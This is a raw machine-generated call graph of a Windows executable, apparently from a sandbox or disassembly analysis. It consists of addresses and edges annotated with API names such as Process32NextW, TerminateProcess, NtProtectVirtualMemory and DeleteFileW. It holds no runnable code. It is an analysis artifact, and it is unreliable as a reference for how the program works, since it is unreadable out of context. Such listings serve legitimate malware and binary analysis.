ae8844 8 API calls __fread_nolock 102663->103174 103175 ae893c 102663->103175 103178 ae8a60 102663->103178 102666 ae8a60 8 API calls 102664->102666 102665->102651 102667 b26a12 102666->102667 102668 aebd57 8 API calls 102667->102668 102669 b269ef 102668->102669 102674 b6a5c5 102670->102674 102671 ae8ec0 52 API calls 102672 b6a632 102671->102672 103195 b518a9 102672->103195 102674->102671 102675 b6a5d4 102674->102675 102675->102449 102677 ae8ec0 52 API calls 102676->102677 102678 b56662 102677->102678 103236 b4dc54 102678->103236 102680 b5666a 102681 b5666e GetLastError 102680->102681 102682 b56683 102680->102682 102681->102682 102682->102449 102685 b6a6c5 102683->102685 102686 b6a705 102683->102686 102684 b6a723 102684->102685 102687 aec98d 39 API calls 102684->102687 102689 b6a780 102684->102689 102685->102449 102686->102684 102688 aec98d 39 API calls 102686->102688 102687->102689 102688->102684 102690 b50372 58 API calls 102689->102690 102690->102685 102692 b689b6 119 API calls 102691->102692 102693 b6a00c 102692->102693 102693->102449 102695 b67b52 102694->102695 102696 b67b38 102694->102696 102697 b660e6 8 API calls 102695->102697 103278 b53fe1 81 API calls __wsopen_s 102696->103278 102700 b67b5d 102697->102700 102699 b67b4a 102699->102411 102701 af0340 206 API calls 102700->102701 102702 b67bc1 102701->102702 102702->102699 102703 b67c5c 102702->102703 102706 b67c03 102702->102706 102704 b67c62 102703->102704 102705 b67cb0 102703->102705 103279 b51ad8 8 API calls 102704->103279 102705->102699 102707 ae8ec0 52 API calls 102705->102707 102712 b5148b 8 API calls 102706->102712 102708 b67cc2 102707->102708 102710 aec2c9 8 API calls 102708->102710 102713 b67ce6 CharUpperBuffW 102710->102713 102711 b67c85 103280 aebd07 8 API calls 102711->103280 102715 b67c3b 102712->102715 102717 b67d00 102713->102717 102716 af2b20 206 API calls 102715->102716 102716->102699 102718 b67d07 102717->102718 102719 b67d53 102717->102719 102723 b5148b 8 API calls 102718->102723 102720 ae8ec0 52 API calls 102719->102720 102721 b67d5b 102720->102721 103281 afaa65 9 API calls 102721->103281 102724 b67d35 102723->102724 102725 af2b20 206 API calls 102724->102725 102725->102699 102726 b67d65 102726->102699 102727 ae8ec0 52 API calls 102726->102727 102728 b67d80 102727->102728 103282 aebd07 8 API calls 102728->103282 102730->102441 102731->102409 102733 aeb338 _wcslen 102732->102733 102734 b0017b 8 API calls 102733->102734 102735 aeb360 __fread_nolock 102734->102735 102736 b0014b 8 API calls 102735->102736 102737 aeb376 102736->102737 102737->102422 102738->102412 102739->102421 102740->102434 102741->102434 102742->102449 102743->102449 102744->102449 102745->102447 102746->102449 102747->102520 102748->102524 102749->102522 102750->102518 102752 b0017b 8 API calls 102751->102752 102753 afc209 102752->102753 102754 b0014b 8 API calls 102753->102754 102755 afc215 102754->102755 102755->102534 102757 aff9fe 102756->102757 102758 affa35 102756->102758 102759 b0017b 8 API calls 102757->102759 102773 affe8a 8 API calls 102758->102773 102761 affa05 WideCharToMultiByte 102759->102761 102772 affa3e 8 API calls __fread_nolock 102761->102772 102762 affa29 102762->102539 102765 aec99e 102764->102765 102766 aec9a5 102764->102766 102765->102766 102774 b06641 39 API calls _strftime 102765->102774 102766->102532 102768 aec9e8 102768->102532 102770 b0014b 8 API calls 102769->102770 102771 ae424e 102770->102771 102771->102546 102771->102547 102772->102762 102773->102762 102774->102768 102775->102559 102808 b502aa 102776->102808 102779 b503f3 102824 b505e9 56 API calls __fread_nolock 102779->102824 102780 b5040b 102782 b50471 102780->102782 102783 b5041b 102780->102783 102784 b50507 102782->102784 102785 b504a1 102782->102785 102796 b50399 __fread_nolock 102782->102796 102807 b50453 102783->102807 102825 b52855 10 API calls 102783->102825 102786 b505b0 102784->102786 102787 b50510 102784->102787 102788 b504a6 102785->102788 102789 b504d1 102785->102789 102786->102796 102833 aec63f 39 API calls 102786->102833 102790 b50515 102787->102790 102791 b5058d 102787->102791 102788->102796 102828 aeca5b 39 API calls 102788->102828 102789->102796 102829 aeca5b 39 API calls 102789->102829 102793 b50554 102790->102793 102794 b5051b 102790->102794 102791->102796 102832 aec63f 39 API calls 102791->102832 102793->102796 102831 aec63f 39 API calls 102793->102831 102794->102796 102830 aec63f 39 API calls 102794->102830 102795 b50427 102826 b52855 10 API calls 102795->102826 102796->102567 102805 b5043e __fread_nolock 102827 b52855 10 API calls 102805->102827 102815 b51844 102807->102815 102809 b502f7 102808->102809 102814 b502bb 102808->102814 102810 aec98d 39 API calls 102809->102810 102812 b502f5 102810->102812 102811 ae8ec0 52 API calls 102811->102814 102812->102779 102812->102780 102812->102796 102814->102811 102814->102812 102834 b04d98 102814->102834 102816 b5184f 102815->102816 102817 b0014b 8 API calls 102816->102817 102818 b51856 102817->102818 102819 b51883 102818->102819 102820 b51862 102818->102820 102821 b0017b 8 API calls 102819->102821 102822 b0017b 8 API calls 102820->102822 102823 b5186b ___scrt_fastfail 102821->102823 102822->102823 102823->102796 102824->102796 102825->102795 102826->102805 102827->102807 102828->102796 102829->102796 102830->102796 102831->102796 102832->102796 102833->102796 102835 b04da6 102834->102835 102836 b04e1b 102834->102836 102843 b04dcb 102835->102843 102844 b0f649 20 API calls _free 102835->102844 102846 b04e2d 40 API calls 3 library calls 102836->102846 102839 b04e28 102839->102814 102840 b04db2 102845 b12b5c 26 API calls _strftime 102840->102845 102842 b04dbd 102842->102814 102843->102814 102844->102840 102845->102842 102846->102839 102848 ae8ec0 52 API calls 102847->102848 102849 b689ed 102848->102849 102872 b68a32 messages 102849->102872 102885 b69730 102849->102885 102851 b68cde 102852 b68eac 102851->102852 102857 b68cec 102851->102857 102935 b69941 59 API calls 102852->102935 102855 b68ebb 102856 b68ec7 102855->102856 102855->102857 102856->102872 102898 b688e3 102857->102898 102858 ae8ec0 52 API calls 102876 b68aa6 102858->102876 102863 b68d25 102912 afffe0 102863->102912 102866 b68d45 102919 b53fe1 81 API calls __wsopen_s 102866->102919 102867 b68d5f 102920 ae7e12 102867->102920 102870 b68d50 GetCurrentProcess TerminateProcess 102870->102867 102872->102570 102876->102851 102876->102858 102876->102872 102917 b44ad3 8 API calls __fread_nolock 102876->102917 102918 b68f7a 41 API calls _strftime 102876->102918 102877 b68f22 102877->102872 102880 b68f36 FreeLibrary 102877->102880 102878 b68d9e 102932 b695d8 74 API calls 102878->102932 102880->102872 102884 b68daf 102884->102877 102933 af1ca0 8 API calls 102884->102933 102934 aeb4c8 8 API calls 102884->102934 102936 b695d8 74 API calls 102884->102936 102937 aec2c9 102885->102937 102887 b6974b CharLowerBuffW 102943 b49805 102887->102943 102894 b6979b 102967 aeadf4 102894->102967 102896 b698bb _wcslen 102896->102876 102897 b697a5 _wcslen 102897->102896 102971 b68f7a 41 API calls _strftime 102897->102971 102899 b688fe 102898->102899 102903 b68949 102898->102903 102900 b0017b 8 API calls 102899->102900 102901 b68920 102900->102901 102902 b0014b 8 API calls 102901->102902 102901->102903 102902->102901 102904 b69af3 102903->102904 102905 b69d08 messages 102904->102905 102910 b69b17 _strcat _wcslen ___std_exception_copy 102904->102910 102905->102863 102906 aec63f 39 API calls 102906->102910 102907 aec98d 39 API calls 102907->102910 102908 aeca5b 39 API calls 102908->102910 102909 ae8ec0 52 API calls 102909->102910 102910->102905 102910->102906 102910->102907 102910->102908 102910->102909 102975 b4f8c5 10 API calls _wcslen 102910->102975 102914 affff5 102912->102914 102913 b0008d NtProtectVirtualMemory 102916 b0005b 102913->102916 102914->102913 102915 b0007b CloseHandle 102914->102915 102914->102916 102915->102916 102916->102866 102916->102867 102917->102876 102918->102876 102919->102870 102921 ae7e1a 102920->102921 102922 b0014b 8 API calls 102921->102922 102923 ae7e28 102922->102923 102976 ae8445 102923->102976 102926 ae8470 102979 aec760 102926->102979 102928 ae8480 102929 b0017b 8 API calls 102928->102929 102930 ae851c 102928->102930 102929->102930 102930->102884 102931 af1ca0 8 API calls 102930->102931 102931->102878 102932->102884 102933->102884 102934->102884 102935->102855 102936->102884 102938 aec2dc 102937->102938 102939 aec2d9 __fread_nolock 102937->102939 102940 b0014b 8 API calls 102938->102940 102939->102887 102941 aec2e7 102940->102941 102942 b0017b 8 API calls 102941->102942 102942->102939 102944 b49825 _wcslen 102943->102944 102945 b49914 102944->102945 102947 b49919 102944->102947 102949 b4985a 102944->102949 102945->102897 102950 aebf73 102945->102950 102947->102945 102973 afe36b 41 API calls 102947->102973 102949->102945 102972 afe36b 41 API calls 102949->102972 102951 b0017b 8 API calls 102950->102951 102952 aebf88 102951->102952 102953 b0014b 8 API calls 102952->102953 102954 aebf96 102953->102954 102955 aeacc0 102954->102955 102957 aeace1 102955->102957 102966 aeaccf 102955->102966 102956 aec2c9 8 API calls 102958 b305a3 __fread_nolock 102956->102958 102959 b30557 102957->102959 102960 aead07 102957->102960 102957->102966 102962 b0014b 8 API calls 102959->102962 102974 ae88e8 8 API calls 102960->102974 102964 b30561 102962->102964 102963 aeacda __fread_nolock 102963->102894 102965 b0017b 8 API calls 102964->102965 102965->102966 102966->102956 102966->102963 102968 aeae0b __fread_nolock 102967->102968 102969 aeae02 102967->102969 102968->102897 102968->102968 102969->102968 102970 aec2c9 8 API calls 102969->102970 102970->102968 102971->102896 102972->102949 102973->102947 102974->102963 102975->102910 102977 b0014b 8 API calls 102976->102977 102978 ae7e30 102977->102978 102978->102926 102980 aec76b 102979->102980 102981 b31285 102980->102981 102986 aec773 messages 102980->102986 102982 b0014b 8 API calls 102981->102982 102984 b31291 102982->102984 102983 aec77a 102983->102928 102986->102983 102987 aec7e0 8 API calls messages 102986->102987 102987->102986 102989 ae3996 ___scrt_fastfail 102988->102989 103021 ae5f32 102989->103021 102993 ae3a3a Shell_NotifyIconW 103025 ae61a9 102993->103025 102994 b240cd Shell_NotifyIconW 102995 ae3a1c 102995->102993 102995->102994 102997 ae3a50 102997->102586 102999 ae3969 102998->102999 103000 ae3919 ___scrt_fastfail 102998->103000 102999->102586 103001 ae3938 Shell_NotifyIconW 103000->103001 103001->102999 103003 b0017b 8 API calls 103002->103003 103004 ae7afa 103003->103004 103005 b0014b 8 API calls 103004->103005 103006 ae7b08 103005->103006 103006->102586 103007->102586 103008->102586 103010 b26610 103009->103010 103011 ae8587 _wcslen 103009->103011 103012 aeadf4 8 API calls 103010->103012 103014 ae859d 103011->103014 103015 ae85c2 103011->103015 103013 b26619 103012->103013 103013->103013 103102 ae88e8 8 API calls 103014->103102 103016 b0014b 8 API calls 103015->103016 103019 ae85ce 103016->103019 103018 ae85a5 __fread_nolock 103018->102586 103020 b0017b 8 API calls 103019->103020 103020->103018 103022 ae39eb 103021->103022 103023 ae5f4e 103021->103023 103022->102995 103055 b4d11f 42 API calls _strftime 103022->103055 103023->103022 103024 b25070 DestroyIcon 103023->103024 103024->103022 103026 ae61c6 103025->103026 103045 ae62a8 103025->103045 103027 ae7ad5 8 API calls 103026->103027 103028 ae61d4 103027->103028 103029 b25278 LoadStringW 103028->103029 103030 ae61e1 103028->103030 103033 b25292 103029->103033 103031 ae8577 8 API calls 103030->103031 103032 ae61f6 103031->103032 103034 ae6203 103032->103034 103042 b252ae 103032->103042 103036 aebed9 8 API calls 103033->103036 103038 ae6229 ___scrt_fastfail 103033->103038 103034->103033 103035 ae620d 103034->103035 103056 ae6b7c 103035->103056 103036->103038 103043 ae628e Shell_NotifyIconW 103038->103043 103041 b252f1 103075 affe6f 51 API calls 103041->103075 103042->103038 103042->103041 103044 aebf73 8 API calls 103042->103044 103043->103045 103046 b252d8 103044->103046 103045->102997 103074 b4a350 9 API calls 103046->103074 103049 b25310 103051 ae6b7c 8 API calls 103049->103051 103050 b252e3 103052 ae7bb5 8 API calls 103050->103052 103053 b25321 103051->103053 103052->103041 103054 ae6b7c 8 API calls 103053->103054 103054->103038 103055->102995 103057 b257fe 103056->103057 103058 ae6b93 103056->103058 103060 b0014b 8 API calls 103057->103060 103076 ae6ba4 103058->103076 103062 b25808 _wcslen 103060->103062 103061 ae621b 103065 ae7bb5 103061->103065 103063 b0017b 8 API calls 103062->103063 103064 b25841 __fread_nolock 103063->103064 103066 ae7bc7 103065->103066 103067 b2641d 103065->103067 103091 ae7bd8 103066->103091 103101 b413c8 8 API calls __fread_nolock 103067->103101 103070 ae7bd3 103070->103038 103071 b26433 103072 b26427 103072->103071 103073 aebed9 8 API calls 103072->103073 103073->103071 103074->103050 103075->103049 103077 ae6bb4 _wcslen 103076->103077 103078 b25860 103077->103078 103079 ae6bc7 103077->103079 103081 b0014b 8 API calls 103078->103081 103086 ae7d74 103079->103086 103083 b2586a 103081->103083 103082 ae6bd4 __fread_nolock 103082->103061 103084 b0017b 8 API calls 103083->103084 103085 b2589a __fread_nolock 103084->103085 103088 ae7d8a 103086->103088 103090 ae7d85 __fread_nolock 103086->103090 103087 b26528 103088->103087 103089 b0017b 8 API calls 103088->103089 103089->103090 103090->103082 103092 ae7be7 103091->103092 103098 ae7c1b __fread_nolock 103091->103098 103093 b2644e 103092->103093 103094 ae7c0e 103092->103094 103092->103098 103095 b0014b 8 API calls 103093->103095 103096 ae7d74 8 API calls 103094->103096 103097 b2645d 103095->103097 103096->103098 103099 b0017b 8 API calls 103097->103099 103098->103070 103100 b26491 __fread_nolock 103099->103100 103101->103072 103102->103018 103113 b4e80e 103103->103113 103105 b4ddd4 Process32NextW 103106 b4de86 CloseHandle 103105->103106 103111 b4ddcd 103105->103111 103106->102594 103107 aebf73 8 API calls 103107->103111 103108 aeb329 8 API calls 103108->103111 103110 ae7bb5 8 API calls 103110->103111 103111->103105 103111->103106 103111->103107 103111->103108 103111->103110 103119 ae568e 103111->103119 103161 afe36b 41 API calls 103111->103161 103114 b4e819 103113->103114 103115 b4e830 103114->103115 103118 b4e836 103114->103118 103162 b06722 GetStringTypeW _strftime 103114->103162 103163 b0666b 39 API calls _strftime 103115->103163 103118->103111 103120 aebf73 8 API calls 103119->103120 103121 ae56a4 103120->103121 103122 aebf73 8 API calls 103121->103122 103123 ae56ac 103122->103123 103124 aebf73 8 API calls 103123->103124 103125 ae56b4 103124->103125 103126 aebf73 8 API calls 103125->103126 103127 ae56bc 103126->103127 103128 b24da1 103127->103128 103129 ae56f0 103127->103129 103130 aebed9 8 API calls 103128->103130 103131 aeacc0 8 API calls 103129->103131 103132 b24daa 103130->103132 103133 ae56fe 103131->103133 103167 aebd57 103132->103167 103134 aeadf4 8 API calls 103133->103134 103136 ae5708 103134->103136 103137 ae5733 103136->103137 103138 aeacc0 8 API calls 103136->103138 103139 ae5778 103137->103139 103140 ae5754 103137->103140 103156 b24dcc 103137->103156 103142 ae5729 103138->103142 103141 aeacc0 8 API calls 103139->103141 103140->103139 103164 ae655e 103140->103164 103143 ae5789 103141->103143 103144 aeadf4 8 API calls 103142->103144 103145 ae579f 103143->103145 103150 aebed9 8 API calls 103143->103150 103144->103137 103148 ae57b3 103145->103148 103153 aebed9 8 API calls 103145->103153 103147 ae8577 8 API calls 103158 b24e8c 103147->103158 103151 ae57be 103148->103151 103154 aebed9 8 API calls 103148->103154 103150->103145 103155 aebed9 8 API calls 103151->103155 103160 ae57c9 103151->103160 103152 aeacc0 8 API calls 103152->103139 103153->103148 103154->103151 103155->103160 103156->103147 103157 ae655e 8 API calls 103157->103158 103158->103139 103158->103157 103173 aead40 8 API calls __fread_nolock 103158->103173 103160->103111 103161->103111 103162->103114 103163->103118 103165 aec2c9 8 API calls 103164->103165 103166 ae5761 103165->103166 103166->103139 103166->103152 103168 aebd64 103167->103168 103169 aebd71 103167->103169 103168->103137 103170 b0014b 8 API calls 103169->103170 103171 aebd7b 103170->103171 103172 b0017b 8 API calls 103171->103172 103172->103168 103173->103158 103174->102663 103176 b0014b 8 API calls 103175->103176 103177 ae894a 103176->103177 103177->102663 103179 ae8a76 103178->103179 103180 b26737 103179->103180 103185 ae8a80 103179->103185 103193 afb7a2 8 API calls 103180->103193 103181 b26744 103194 aeb4c8 8 API calls 103181->103194 103184 b26762 103184->103184 103185->103181 103186 ae8b94 103185->103186 103188 ae8b9b 103185->103188 103187 b0014b 8 API calls 103186->103187 103187->103188 103188->102663 103189->102644 103190->102648 103191->102661 103192->102669 103193->103181 103194->103184 103196 b518b6 103195->103196 103197 b0014b 8 API calls 103196->103197 103198 b518bd 103197->103198 103201 b4fcb5 103198->103201 103200 b518f7 103200->102675 103202 aec2c9 8 API calls 103201->103202 103203 b4fcc8 CharLowerBuffW 103202->103203 103209 b4fcdb 103203->103209 103204 b4fce5 ___scrt_fastfail 103204->103200 103205 b4fd19 103207 b4fd2b 103205->103207 103210 ae655e 8 API calls 103205->103210 103206 ae655e 8 API calls 103206->103209 103208 b0017b 8 API calls 103207->103208 103211 b4fd59 103208->103211 103209->103204 103209->103205 103209->103206 103210->103207 103212 b4fd7b 103211->103212 103234 b4fbed 8 API calls 103211->103234 103219 b4fe0c 103212->103219 103215 b4fdb8 103215->103204 103216 b0014b 8 API calls 103215->103216 103217 b4fdd2 103216->103217 103218 b0017b 8 API calls 103217->103218 103218->103204 103220 aebf73 8 API calls 103219->103220 103221 b4fe3e 103220->103221 103222 aebf73 8 API calls 103221->103222 103223 b4fe47 103222->103223 103224 aebf73 8 API calls 103223->103224 103231 b4fe50 103224->103231 103225 ae8577 8 API calls 103225->103231 103226 b50114 103226->103215 103227 b066f8 GetStringTypeW 103227->103231 103229 b06641 39 API calls 103229->103231 103230 b4fe0c 40 API calls 103230->103231 103231->103225 103231->103226 103231->103227 103231->103229 103231->103230 103232 aead40 8 API calls 103231->103232 103233 aebed9 8 API calls 103231->103233 103235 b06722 GetStringTypeW _strftime 103231->103235 103232->103231 103233->103231 103234->103211 103235->103231 103237 aebf73 8 API calls 103236->103237 103238 b4dc73 103237->103238 103239 aebf73 8 API calls 103238->103239 103240 b4dc7c 103239->103240 103241 aebf73 8 API calls 103240->103241 103242 b4dc85 103241->103242 103260 ae5851 103242->103260 103247 b4dcab 103248 ae568e 8 API calls 103247->103248 103250 b4dcbf FindFirstFileW 103248->103250 103249 ae6b7c 8 API calls 103249->103247 103251 b4dd4b FindClose 103250->103251 103254 b4dcde 103250->103254 103255 b4dd56 103251->103255 103252 b4dd26 FindNextFileW 103252->103254 103253 aebed9 8 API calls 103253->103254 103254->103251 103254->103252 103254->103253 103256 ae7bb5 8 API calls 103254->103256 103257 ae6b7c 8 API calls 103254->103257 103255->102680 103256->103254 103258 b4dd17 DeleteFileW 103257->103258 103258->103252 103259 b4dd42 FindClose 103258->103259 103259->103255 103272 b222d0 103260->103272 103263 ae587d 103266 ae8577 8 API calls 103263->103266 103264 ae5898 103265 aebd57 8 API calls 103264->103265 103267 ae5889 103265->103267 103266->103267 103274 ae55dc 103267->103274 103270 b4eab0 GetFileAttributesW 103271 b4dc99 103270->103271 103271->103247 103271->103249 103273 ae585e GetFullPathNameW 103272->103273 103273->103263 103273->103264 103275 ae55ea 103274->103275 103276 aeadf4 8 API calls 103275->103276 103277 ae55fe 103276->103277 103277->103270 103278->102699 103279->102711 103280->102699 103281->102726 103282->102699 103283->102472 103284->102472 103285->102470 103286->102475 103287->102375 103288->102373 103289->102372 103290->102372 103308 aecf80 103291->103308 103293 aebfb5 103294 b30db6 103293->103294 103295 aebfc3 103293->103295 103317 aeb4c8 8 API calls 103294->103317 103297 b0014b 8 API calls 103295->103297 103299 aebfd4 103297->103299 103298 b30dc1 103300 aebf73 8 API calls 103299->103300 103302 aebfde 103300->103302 103301 aebfed 103303 b0014b 8 API calls 103301->103303 103302->103301 103304 aebed9 8 API calls 103302->103304 103305 aebff7 103303->103305 103304->103301 103316 aebe7b 39 API calls 103305->103316 103307 aec01b 103307->102279 103309 aed1c7 103308->103309 103314 aecf93 103308->103314 103309->103293 103311 aebf73 8 API calls 103311->103314 103312 aed03d 103312->103293 103314->103311 103314->103312 103318 b005b2 5 API calls __Init_thread_wait 103314->103318 103319 b00413 29 API calls __onexit 103314->103319 103320 b00568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103314->103320 103316->103307 103317->103298 103318->103314 103319->103314 103320->103314 104690 aef4c0 104693 afa025 104690->104693 104692 aef4cc 104694 afa046 104693->104694 104699 afa0a3 104693->104699 104696 af0340 207 API calls 104694->104696 104694->104699 104700 afa077 104696->104700 104697 b3806b 104697->104697 104698 afa0e7 104698->104692 104699->104698 104702 b53fe1 81 API calls __wsopen_s 104699->104702 104700->104698 104700->104699 104701 aebed9 8 API calls 104700->104701 104701->104699 104702->104697 103321 af0ebf 103322 af0ed3 103321->103322 103328 af1425 103321->103328 103323 af0ee5 103322->103323 103326 b0014b 8 API calls 103322->103326 103324 b3562c 103323->103324 103327 af0f3e 103323->103327 103354 aeb4c8 8 API calls 103323->103354 103355 b51b14 8 API calls 103324->103355 103326->103323 103329 af2b20 207 API calls 103327->103329 103347 af049d messages 103327->103347 103328->103323 103331 aebed9 8 API calls 103328->103331 103353 af0376 messages 103329->103353 103331->103323 103332 b3632b 103359 b53fe1 81 API calls __wsopen_s 103332->103359 103333 af1e50 40 API calls 103333->103353 103334 af1695 103339 aebed9 8 API calls 103334->103339 103334->103347 103336 b0014b 8 API calls 103336->103353 103337 b35cdb 103343 aebed9 8 API calls 103337->103343 103337->103347 103338 b3625a 103358 b53fe1 81 API calls __wsopen_s 103338->103358 103339->103347 103342 af1990 207 API calls 103342->103353 103343->103347 103344 aebed9 8 API calls 103344->103353 103345 b005b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 103345->103353 103346 aebf73 8 API calls 103346->103353 103348 b36115 103356 b53fe1 81 API calls __wsopen_s 103348->103356 103349 af0aae messages 103357 b53fe1 81 API calls __wsopen_s 103349->103357 103351 b00568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 103351->103353 103352 b00413 29 API calls pre_c_initialization 103352->103353 103353->103332 103353->103333 103353->103334 103353->103336 103353->103337 103353->103338 103353->103342 103353->103344 103353->103345 103353->103346 103353->103347 103353->103348 103353->103349 103353->103351 103353->103352 103354->103323 103355->103347 103356->103349 103357->103347 103358->103347 103359->103347 104703 aef4dc 104704 aecab0 207 API calls 104703->104704 104705 aef4ea 104704->104705 103360 aedd3d 103361 b319c2 103360->103361 103362 aedd63 103360->103362 103365 b31a82 103361->103365 103370 b31a26 103361->103370 103373 b31a46 103361->103373 103363 aedead 103362->103363 103366 b0014b 8 API calls 103362->103366 103367 b0017b 8 API calls 103363->103367 103420 b53fe1 81 API calls __wsopen_s 103365->103420 103372 aedd8d 103366->103372 103379 aedee4 __fread_nolock 103367->103379 103368 b31a7d 103418 afe6e8 207 API calls 103370->103418 103374 b0014b 8 API calls 103372->103374 103372->103379 103373->103368 103419 b53fe1 81 API calls __wsopen_s 103373->103419 103375 aedddb 103374->103375 103375->103370 103377 aede16 103375->103377 103376 b0017b 8 API calls 103376->103379 103378 af0340 207 API calls 103377->103378 103380 aede29 103378->103380 103379->103373 103379->103376 103380->103368 103380->103379 103381 b31aa5 103380->103381 103382 aede77 103380->103382 103384 aed526 103380->103384 103421 b53fe1 81 API calls __wsopen_s 103381->103421 103382->103363 103382->103384 103385 b0014b 8 API calls 103384->103385 103386 aed589 103385->103386 103402 aec32d 103386->103402 103389 b0014b 8 API calls 103395 aed66e messages 103389->103395 103391 aebed9 8 API calls 103391->103395 103394 b31f79 103423 b456ae 8 API calls messages 103394->103423 103395->103391 103395->103394 103396 b31f94 103395->103396 103398 aec3ab 8 API calls 103395->103398 103399 aed911 messages 103395->103399 103422 aeb4c8 8 API calls 103395->103422 103398->103395 103400 aed9ac messages 103399->103400 103409 aec3ab 103399->103409 103401 aed9c3 103400->103401 103417 afe30a 8 API calls messages 103400->103417 103405 aec33d 103402->103405 103403 aec345 103403->103389 103404 b0014b 8 API calls 103404->103405 103405->103403 103405->103404 103406 aebf73 8 API calls 103405->103406 103407 aebed9 8 API calls 103405->103407 103408 aec32d 8 API calls 103405->103408 103406->103405 103407->103405 103408->103405 103410 aec3b9 103409->103410 103416 aec3e1 messages 103409->103416 103411 aec3c7 103410->103411 103413 aec3ab 8 API calls 103410->103413 103412 aec3cd 103411->103412 103414 aec3ab 8 API calls 103411->103414 103412->103416 103424 aec7e0 8 API calls messages 103412->103424 103413->103411 103414->103412 103416->103400 103417->103400 103418->103373 103419->103368 103420->103368 103421->103368 103422->103395 103423->103396 103424->103416 104706 b18782 104711 b1853e 104706->104711 104709 b187aa 104716 b1856f try_get_first_available_module 104711->104716 104713 b1876e 104730 b12b5c 26 API calls _strftime 104713->104730 104715 b186c3 104715->104709 104723 b20d04 104715->104723 104722 b186b8 104716->104722 104726 b0917b 40 API calls 2 library calls 104716->104726 104718 b1870c 104718->104722 104727 b0917b 40 API calls 2 library calls 104718->104727 104720 b1872b 104720->104722 104728 b0917b 40 API calls 2 library calls 104720->104728 104722->104715 104729 b0f649 20 API calls _free 104722->104729 104731 b20401 104723->104731 104725 b20d1f 104725->104709 104726->104718 104727->104720 104728->104722 104729->104713 104730->104715 104732 b2040d ___DestructExceptionObject 104731->104732 104733 b2041b 104732->104733 104736 b20454 104732->104736 104789 b0f649 20 API calls _free 104733->104789 104735 b20420 104790 b12b5c 26 API calls _strftime 104735->104790 104742 b209db 104736->104742 104741 b2042a __wsopen_s 104741->104725 104792 b207af 104742->104792 104745 b20a26 104810 b15594 104745->104810 104746 b20a0d 104824 b0f636 20 API calls _free 104746->104824 104749 b20a12 104825 b0f649 20 API calls _free 104749->104825 104750 b20a2b 104751 b20a34 104750->104751 104752 b20a4b 104750->104752 104826 b0f636 20 API calls _free 104751->104826 104823 b2071a CreateFileW 104752->104823 104756 b20a39 104827 b0f649 20 API calls _free 104756->104827 104757 b20b01 GetFileType 104760 b20b53 104757->104760 104761 b20b0c GetLastError 104757->104761 104759 b20ad6 GetLastError 104829 b0f613 20 API calls 2 library calls 104759->104829 104832 b154dd 21 API calls 3 library calls 104760->104832 104830 b0f613 20 API calls 2 library calls 104761->104830 104762 b20a84 104762->104757 104762->104759 104828 b2071a CreateFileW 104762->104828 104766 b20b1a CloseHandle 104766->104749 104769 b20b43 104766->104769 104768 b20ac9 104768->104757 104768->104759 104831 b0f649 20 API calls _free 104769->104831 104771 b20b74 104773 b20bc0 104771->104773 104833 b2092b 72 API calls 4 library calls 104771->104833 104772 b20b48 104772->104749 104777 b20bed 104773->104777 104834 b204cd 72 API calls 4 library calls 104773->104834 104776 b20be6 104776->104777 104779 b20bfe 104776->104779 104835 b18a2e 104777->104835 104780 b20478 104779->104780 104781 b20c7c CloseHandle 104779->104781 104791 b204a1 LeaveCriticalSection __wsopen_s 104780->104791 104850 b2071a CreateFileW 104781->104850 104783 b20ca7 104784 b20cdd 104783->104784 104785 b20cb1 GetLastError 104783->104785 104784->104780 104851 b0f613 20 API calls 2 library calls 104785->104851 104787 b20cbd 104852 b156a6 21 API calls 3 library calls 104787->104852 104789->104735 104790->104741 104791->104741 104794 b207d0 104792->104794 104795 b207ea 104792->104795 104794->104795 104860 b0f649 20 API calls _free 104794->104860 104853 b2073f 104795->104853 104797 b207df 104861 b12b5c 26 API calls _strftime 104797->104861 104799 b20822 104800 b20851 104799->104800 104862 b0f649 20 API calls _free 104799->104862 104807 b208a4 104800->104807 104864 b0da7d 26 API calls 2 library calls 104800->104864 104803 b2089f 104805 b2091e 104803->104805 104803->104807 104804 b20846 104863 b12b5c 26 API calls _strftime 104804->104863 104865 b12b6c 11 API calls _abort 104805->104865 104807->104745 104807->104746 104809 b2092a 104811 b155a0 ___DestructExceptionObject 104810->104811 104868 b132d1 EnterCriticalSection 104811->104868 104813 b155ee 104869 b1569d 104813->104869 104815 b155cc 104818 b15373 __wsopen_s 21 API calls 104815->104818 104816 b155a7 104816->104813 104816->104815 104820 b1563a EnterCriticalSection 104816->104820 104817 b15617 __wsopen_s 104817->104750 104819 b155d1 104818->104819 104819->104813 104872 b154ba EnterCriticalSection 104819->104872 104820->104813 104821 b15647 LeaveCriticalSection 104820->104821 104821->104816 104823->104762 104824->104749 104825->104780 104826->104756 104827->104749 104828->104768 104829->104749 104830->104766 104831->104772 104832->104771 104833->104773 104834->104776 104836 b15737 __wsopen_s 26 API calls 104835->104836 104839 b18a3e 104836->104839 104837 b18a44 104874 b156a6 21 API calls 3 library calls 104837->104874 104839->104837 104840 b18a76 104839->104840 104843 b15737 __wsopen_s 26 API calls 104839->104843 104840->104837 104841 b15737 __wsopen_s 26 API calls 104840->104841 104844 b18a82 CloseHandle 104841->104844 104842 b18a9c 104845 b18abe 104842->104845 104875 b0f613 20 API calls 2 library calls 104842->104875 104846 b18a6d 104843->104846 104844->104837 104847 b18a8e GetLastError 104844->104847 104845->104780 104849 b15737 __wsopen_s 26 API calls 104846->104849 104847->104837 104849->104840 104850->104783 104851->104787 104852->104784 104855 b20757 104853->104855 104854 b20772 104854->104799 104855->104854 104866 b0f649 20 API calls _free 104855->104866 104857 b20796 104867 b12b5c 26 API calls _strftime 104857->104867 104859 b207a1 104859->104799 104860->104797 104861->104795 104862->104804 104863->104800 104864->104803 104865->104809 104866->104857 104867->104859 104868->104816 104873 b13319 LeaveCriticalSection 104869->104873 104871 b156a4 104871->104817 104872->104813 104873->104871 104874->104842 104875->104845 104876 af235c 104885 af2365 __fread_nolock 104876->104885 104877 ae8ec0 52 API calls 104877->104885 104878 b374e3 104888 b413c8 8 API calls __fread_nolock 104878->104888 104880 b374ef 104884 aebed9 8 API calls 104880->104884 104886 af1ff7 __fread_nolock 104880->104886 104881 af23b6 104883 ae7d74 8 API calls 104881->104883 104882 b0014b 8 API calls 104882->104885 104883->104886 104884->104886 104885->104877 104885->104878 104885->104881 104885->104882 104885->104886 104887 b0017b 8 API calls 104885->104887 104887->104885 104888->104880 104889 ae105b 104894 ae52a7 104889->104894 104891 ae106a 104925 b00413 29 API calls __onexit 104891->104925 104893 